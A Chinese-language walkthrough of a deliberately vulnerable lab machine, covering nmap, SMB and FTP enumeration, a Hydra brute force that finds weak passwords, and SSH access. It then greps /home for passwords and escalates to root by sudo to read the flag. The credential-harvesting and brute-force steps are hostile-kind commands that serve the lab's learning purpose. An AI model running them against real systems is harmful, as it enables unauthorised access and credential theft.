很喜欢的靶机,有效暴露了自己的不足,里面的兔子洞基本上全部踩了一遍,所以写一下这篇wp兼笔记
感想:打靶很多时候是反直觉的,有的时候不能基于感觉,或者说觉得概率很小就不去尝试,它是一个严谨的,纯粹理性的过程
wp部分
nmap
plain
┌──(kali㉿kali)-[~/PG/replayplay/stapter]
└─$ nmap -sT -p- 192.168.113.240 -oA nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 09:52 EDT
Nmap scan report for 192.168.113.240
Host is up (0.0038s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
12380/tcp open unknown
MAC Address: 08:00:27:D9:17:D1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 119.02 secondsawk剪切端口
plain
┌──(kali㉿kali)-[~/PG/replayplay/stapter]
└─$ port=$(cat nmapscan/ports.nmap | grep open | awk -F '/' '{print $1}'|paste -sd ',')tcp详细信息扫描
plain
┌──(kali㉿kali)-[~/PG/replayplay/stapter]
└─$ nmap -sT -sC -sV -O -p21,22,53,80,139,666,3306,12380 192.168.113.240 -oA nmapscan/details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 09:59 EDT
Nmap scan report for 192.168.113.240
Host is up (0.0024s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.113.200
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 550 Permission denied.
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)
| 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)
|_ 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)
53/tcp open domain dnsmasq 2.75
| dns-nsid:
|_ bind.version: dnsmasq-2.75
80/tcp open http PHP cli server 5.5 or later
|_http-title: 404 Not Found
139/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
666/tcp open tcpwrapped
3306/tcp open mysql MySQL (blocked - too many connection errors)
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Tim, we need to-do better next year for Initech
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:D9:17:D1 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.13 - 4.4 (97%), Linux 3.16 - 4.6 (97%), Linux 3.8 - 3.16 (97%), Linux 4.4 (97%), Linux 3.2 - 4.14 (97%), Linux 3.13 (95%), Linux 3.18 (94%), Linux 4.2 (94%), Linux 3.13 - 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-10-15T13:44:19
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: red
| NetBIOS computer name: RED\x00
| Domain name: \x00
| FQDN: red
|_ System time: 2025-10-15T14:44:20+01:00
|_nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -36m03s, deviation: 34m34s, median: -16m06s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.55 seconds这里可以看到ftp可以匿名访问
53端口版本是 dnsmasq 2.75,searchsploit有漏洞,但是拒绝服务攻击不可利用
12380的title处,提到了tim这个人名,记录到用户名字典中
nmap脚本扫描
信息收集
ftp匿名访问
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ ftp 192.168.113.240
Connected to 192.168.113.240.
220-
220-|-----------------------------------------------------------------------------------------|
220-| Harry, make sure to update the banner when you get a chance to show who has access here |
220-|-----------------------------------------------------------------------------------------|
220-
220
Name (192.168.113.240:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.成功访问,这里有个人名harry,记录到用户名字典中
plain
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 107 Jun 03 2016 note
226 Directory send OK.
ftp> get note
local: note remote: note
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note (107 bytes).
100% |**********************************************************| 107 15.70 KiB/s 00:00 ETA
226 Transfer complete.
107 bytes received in 00:00 (9.05 KiB/s)确认没有其他文件后退出
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ cat note
Elly, make sure you update the payload information. Leave it in your FTP account once your are done, John.Elly和john加入用户名字典,这里提到让elly更改ftp中信息,猜测ftp还可以用elly登录
但是信息收集到后期(包括用户名字典和其他hint),还是怎么都爆破不出来ftp
继续进行信息收集,
列出smb服务器上的共享资源:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ smbclient -L //192.168.113.240
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
kathy Disk Fred, What are we doing here?
tmp Disk All temporary files should be stored here
IPC$ IPC IPC Service (red server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP RED-L: "List" 的意思,表示列出目标主机上的可用共享资源(如共享文件夹、打印机等)。
这里的kathy和tmp是可访问的文件共享目录
访问指定的文件共享目录:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ smbclient //192.168.113.240/kathy
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Jun 3 12:52:52 2016
.. D 0 Mon Jun 6 17:39:56 2016
kathy_stuff D 0 Sun Jun 5 11:02:27 2016
backup D 0 Sun Jun 5 11:04:14 2016
19478204 blocks of size 1024. 16309640 blocks available
smb: \> 里面东西不多,全dump下来:
plain
smb: \> cd kathy_stuff\
smb: \kathy_stuff\> ls
. D 0 Sun Jun 5 11:02:27 2016
.. D 0 Fri Jun 3 12:52:52 2016
todo-list.txt N 64 Sun Jun 5 11:02:27 2016
19478204 blocks of size 1024. 16309636 blocks available
smb: \kathy_stuff\> get todo-list.txt
getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (3.9 KiloBytes/sec) (average 3.9 KiloBytes/sec)
smb: \kathy_stuff\> cd ../
smb: \> ls
. D 0 Fri Jun 3 12:52:52 2016
.. D 0 Mon Jun 6 17:39:56 2016
kathy_stuff D 0 Sun Jun 5 11:02:27 2016
backup D 0 Sun Jun 5 11:04:14 2016
19478204 blocks of size 1024. 16309632 blocks available
smb: \> cd backup
smb: \backup\> ls
. D 0 Sun Jun 5 11:04:14 2016
.. D 0 Fri Jun 3 12:52:52 2016
vsftpd.conf N 5961 Sun Jun 5 11:03:45 2016
wordpress-4.tar.gz N 6321767 Mon Apr 27 13:14:46 2015
19478204 blocks of size 1024. 16309632 blocks available
smb: \backup\> mget *
Get file vsftpd.conf? y
getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (215.6 KiloBytes/sec) (average 136.8 KiloBytes/sec)
Get file wordpress-4.tar.gz? y
getting file \backup\wordpress-4.tar.gz of size 6321767 as wordpress-4.tar.gz (796.4 KiloBytes/sec) (average 792.7 KiloBytes/sec)
smb: \backup\> 查看,没有发现什么很有价值的线索,把kathy加入用户名字典
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ cat todo-list.txt
I'm making sure to backup anything important for Initech, Kathy3306端口:无未授权访问
两个web端口均没有扫出来什么很有用的信息
在12380端口处源码注释:
plain
<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->
<!-- You can change the black color for the filter with those colors: blue, green, red, orange -->
<!-- H1 can have 2 designs: "logo" and "logo cursive" -->增加用户名zoe,按注释改了一下前端,没什么信息
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ curl -I http://192.168.113.240:12380
HTTP/1.1 400 Bad Request
Date: Wed, 15 Oct 2025 14:38:41 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 03 Jun 2016 16:55:33 GMT
ETag: "6a16a-53462974b46e8"
Accept-Ranges: bytes
Content-Length: 434538
Dave: Soemthing doesn't look right here
Connection: close
Content-Type: text/htm这里有一个自定义的dave,加入字典
666端口:这个nmap没有扫出来是什么服务,但是是开放的
使用nc/telnet尝试访问:
plain
telnet 192.168.113.240 666
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ telnet 192.168.113.240 666
Trying 192.168.113.240...
Connected to 192.168.113.240.
Escape character is '^]'.
Pd��Hp���,2
message2.jpgUT +�QWJ�QWux
��z
T��P���A@� �UT�T�2>��RDK�Jj�"DL[E�
0<Ĵ�ʮn���V�W�H ����
_�dr���9��u�Y�ܳoX�Y�2�e���2��y}�a����>`� �:�y�����^�sC��
��ncܤI��+j�[����=,Κ����s����is�M?����eY��������]sS�bQ���AoA��9ӂ���x�Oݙ4����1�N���3w�&&q��'i�fL��\���̀ޚ��:�ũ�r����{���:i���T�/�-W&�N�<�\.���Ф���^���g�.ּ�|W�����j�f~��x'�O��̚��`aТ�KV��
ou����7�|��ÄO�nKܾ#)���{���g8�u([r�H~A�qYQq�w��?}��?��Ty��ժk��SW������f�F�k��y������Y_?n2�߆^
����m��f".��?B��,��[�&�NbM���V�� 3&M~{����-�]_��[qt��o/ֶ�����������_@N�����{��E������i�.L�\gD��p���Ym
I�ˇ9-a)T���SWb�N�&���vO�3A#�,��^������4�C͈�}��~�R�`wT��KTamۙf�
��L}AJ�H�2�(Okɩ␦����dN���.npy.9��Rr9�Ү�#�Og���~�]V�BGu�=��HU���I��GTQ���
L�ڒ��*P?����Dfv�`��k�S�P0���
���q�2��t�w����;����G����?P]�V���4<Q{>�h(}]LE�Hi��2~�@ǝ�xn籡��U���'4�z��%jow^Mo�~:� ��yνn����=fa���r�ٰ��U�t�y��B~q^7�,���:��ҩ;��ȝ��{���O 1M�ˁ�Ĉ��T��Y��Ԗ��O␦ְ7�:�/�7;��"3\��lt6"9:�?�,����My�Ք1��2�x5
��z��z�(ho���cGBn]�3�О�7��JA�"ֹconnected to...:TCP三次握手成功,建立了连接
这里可以看到,由于 终端默认以文本(UTF-8)显示接收到的数据。如果远端发来的不是文本而是二进制数据(例如图片、压缩包、加密流、音频或其它二进制协议),终端会把不可打印字节显示为乱七八糟的字符或问号
开头和结尾的片段都有message2.jpg
怀疑远端发送的是jpeg文件或jpeg文件名的二进制流
把输出的数据保存到bin中然后工具识别
(这里注意nc比telnet好,telnet好像操作起来有问题)
plain
nc 192.168.113.240 666 >output.bin
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ nc 192.168.113.240 666 >output.bin
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ file output.bin
output.bin: Zip archive data, made by v3.0 UNIX, extract using at least v2.0, last modified Jun 03 2016 16:03:08, uncompressed size 12821, method=deflate发现是一个zip文件
使用xxd看十六进制和可打印文本
plain
xxd -l 128 output.bin # 显示前128字节的16进制与可打印文本
plain
00000000: 504b 0304 1400 0200 0800 6480 c348 70df PK........d..Hp.
00000010: 1581 aa2c 0000 1532 0000 0c00 1c00 6d65 ...,...2......me
00000020: 7373 6167 6532 2e6a 7067 5554 0900 032b ssage2.jpgUT...+
00000030: 9c51 574a 9c51 5775 780b 0001 04f5 0100 .QWJ.QWux.......
00000040: 0004 1400 0000 ad7a 0b54 13e7 beef 5094 .......z.T....P.
00000050: 8888 4140 a220 19ab 5554 c454 11a9 1032 ..A@. ..UT.T...2
00000060: 3e8a d452 444b 1585 4a6a a922 444c 5b45 >..RDK..Jj."DL[E
00000070: a20c 1914 303c c4b4 b5ca ae6e 898a 8a56 ....0<.....n...V查到这是zip的文件头,所以这是一个包含message2.jpg的压缩包
查看内部文件列表:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ unzip -l output.bin
Archive: output.bin
Length Date Time Name
--------- ---------- ----- ----
12821 2016-06-03 11:03 message2.jpg
--------- -------
12821 1 file
解压缩:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ unzip output.bin
Archive: output.bin
inflating: message2.jpg
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ ls
message2.jpg note output.bin stapter todo-list.txt vsftpd.conf wordpress-4.tar.gz查看图片:
还是没什么信息,把scott加入字典
检查exiftool:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ exiftool message2.jpg
ExifTool Version Number : 13.25
File Name : message2.jpg
Directory : .
File Size : 13 kB
File Modification Date/Time : 2016:06:03 11:03:07-04:00
File Access Date/Time : 2025:10:15 10:52:47-04:00
File Inode Change Date/Time : 2025:10:15 10:50:49-04:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 72
Y Resolution : 72
Current IPTC Digest : 020ab2da2a37c332c141ebf819e37e6d
Contact : If you are reading this, you should get a cookie!
Application Record Version : 4
IPTC Digest : d41d8cd98f00b204e9800998ecf8427e
Warning : IPTCDigest is not current. XMP may be out of sync
Image Width : 364
Image Height : 77
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 364x77
Megapixels : 0.028contact:这里说get a cookie,这里又找了一会,没找到线索
然后进行binwalk查是否有嵌入的二进制,无线索
steghide查隐写
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ steghide info message2.jpg
"message2.jpg":
format: jpeg
capacity: 318.0 Byte
Try to get information about embedded data ? (y/n) y
Enter passphrase: 看起来可能有隐写,使用stegseek,分别用之前收集的字典(除了用户名还有一些值得注意的信息),rockyou.txt爆破,均失败
然后这里一直没打出来,经过一番搜索
关于ftp爆破,有一个参数-e nsr
基于英语国家的密码习惯
这是hydra的额外尝试,尝试空密码,用户名作密码,用户名反转作密码
知道了这个参数,重新之前的ftp爆破
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ hydra -L u.txt -e nsr ftp://192.168.113.240
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-15 11:22:41
[DATA] max 16 tasks per 1 server, overall 16 tasks, 105 login tries (l:35/p:3), ~7 tries per task
[DATA] attacking ftp://192.168.113.240:21/
[21][ftp] host: 192.168.113.240 login: elly password: ylle
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-15 11:23:05不得不说,以前真不知道国外有这种设置密码的习惯,这个参数的使用需要加入到攻击链中
ssh碰撞,elly无法登录
进去之后逐个查看,发现passwd可读,拿下来看
追加到自己的字典里
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ cat passwd | grep -E '/bin/bash|/bin/sh|/bin/zsh' | awk -F ':' '{print $1}' >>u.txt 处于严谨性,由于拿到了新的用户名,不排除再爆一次能有别的ftp用户密码爆出的可能
还是先测nsr:
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ hydra -L u.txt -e nsr ftp://192.168.113.240
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-15 11:41:27
[DATA] max 16 tasks per 1 server, overall 16 tasks, 183 login tries (l:61/p:3), ~12 tries per task
[DATA] attacking ftp://192.168.113.240:21/
[21][ftp] host: 192.168.113.240 login: elly password: ylle
[21][ftp] host: 192.168.113.240 login: SHayslett password: SHayslett
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-15 11:42:06还真的有一个
继续处于严谨性,再ssh碰撞一次
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ ssh SHayslett@192.168.113.240
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.113.240's password:
Welcome back!
SHayslett@red:~$ 还真给登上了,所以打靶一定要严谨
提权
开始枚举
plain
┌──(kali㉿kali)-[~/PG/replayplay]
└─$ ssh SHayslett@192.168.113.240
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
SHayslett@192.168.113.240's password:
Welcome back!
SHayslett@red:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for SHayslett:
Sorry, try again.
[sudo] password for SHayslett:
Sorry, try again.
[sudo] password for SHayslett:
Sorry, user SHayslett may not run sudo on red.
SHayslett@red:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/ubuntu-core-launcher
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/authbind/helper
/bin/mount
/bin/umount
/bin/ping
/bin/fusermount
/bin/ping6
/bin/susuid暂时没找到可利用的,做到这里,我突然想起了之前的passwd,用户名那么多属实罕见
根据之前的经验(我之前的wp可能提到过)
用户特别多的靶机,在/home里递归查找密码一定是一个好的思路
于是:
plain
SHayslett@red:~$ grep -R -i 'pass' /home 2>/dev/null
/home/peter/.zcompdump:'chpass' '_chsh'
/home/peter/.zcompdump:'passwd' '_users'
/home/peter/.zcompdump:'systemd-ask-password' '_systemd'
/home/peter/.zcompdump:'systemd-tty-ask-password-agent' '_systemd'
/home/peter/.zcompdump:'yppasswd' '_yp'
/home/JKanode/.bash_history:sshpass -p thisimypassword ssh JKanode@localhost
/home/JKanode/.bash_history:apt-get install sshpass
/home/JKanode/.bash_history:sshpass -p JZQuyIN5 peter@localhost成功找到了别的用户的密码
plain
SHayslett@red:~$ su - peter
Password:
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~). This function can help you with a few settings that should
make your use of the shell easier.
You can:
(q) Quit and do nothing. The function will be run again next time.
(0) Exit, creating the file ~/.zshrc containing just a comment.
That will prevent this function being run again.
(1) Continue to the main menu.
(2) Populate your ~/.zshrc with the configuration recommended
by the system administrator and exit (you will need to edit
the file by hand, if so desired).
--- Type one of the keys in parentheses ---
Aborting.
The function will be run again next time. To prevent this, execute:
touch ~/.zshrc
red% id
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
red% whoami
peter
red% sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter:
Matching Defaults entries for peter on red:
lecture=always, env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User peter may run the following commands on red:
(ALL : ALL) ALL
red% sudo -i
➜ ~ id
uid=0(root) gid=0(root) groups=0(root)
➜ ~ whoami
root
➜ ~ cd /root
➜ ~ ls
fix-wordpress.sh flag.txt issue python.sh wordpress.sql
➜ ~ cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
.-'''''-.
|'-----'|
|-.....-|
| |
| |
_,._ | |
__.o` o`"-. | |
.-O o `"-.o O )_,._ | |
( o O o )--.-"`O o"-.`'-----'`
'--------' ( o O o)
`----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b
➜ ~ 成功提权